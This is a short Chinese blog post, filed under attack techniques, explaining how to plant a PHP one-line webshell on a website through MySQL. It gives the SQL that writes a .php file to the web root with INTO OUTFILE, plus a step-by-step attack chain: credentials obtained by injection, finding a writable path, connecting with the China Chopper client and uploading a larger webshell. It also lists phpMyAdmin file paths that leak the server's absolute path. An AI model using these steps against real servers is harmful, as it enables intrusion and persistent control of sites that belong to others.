加载中…通过mysql写入一句话木马
(2015-08-06 21:34:59)
标签:
it一句话木马查询结果列数mysql数据库 |
分类: 攻击技术 |
USE mysql;# MySQL 返回的查询结果为空(即零行)。
# MySQL 返回的查询结果为空(即零行)。
CREATE TABLE a(
cmd1 text NOT NULL
);# MySQL 返回的查询结果为空(即零行)。
# MySQL 返回的查询结果为空(即零行)。
INSERT INTO a( cmd1 )
VALUES (
''
);# 影响列数: 1
# 影响列数: 1
SELECT cmd1
FROM a
INTO OUTFILE '/data/www/heneng/cp/mm.php';# 影响列数: 1
# 影响列数: 1
DROP TABLE IF EXISTS a;# MySQL 返回的查询结果为空(即零行)。
# MySQL 返回的查询结果为空(即零行)。
1.首先通过注入获取mysql数据库的用户名和密码
2.通过相关渠道获取mysql数据库的路径
3.使用用户名和密码登陆mysql
4.获取网站可写目录的绝对路径
5.点击进入sql编辑器,输入上述代码,将一句话木马写入网站
6.使用菜刀连接一句话,上传大马
方法二:
使用phpmyadmin中的sql语句
写文件:
select '' into outfile
'/data/www/heneng/cp/log.php'
最后的/cp/log.php的文件名可以任意起的,不是固定的。
利用mysql数据库爆网站绝对路径方法
使用phpmyadmin的某个文件报错
phpmyadmin爆路径方法
weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php
phpMyAdmin/libraries/select_lang.lib.php
参考:360搜索“mysql写入一句话木马文件”
喜欢
0
赠金笔
前一篇:DOS命令大全(经典收藏)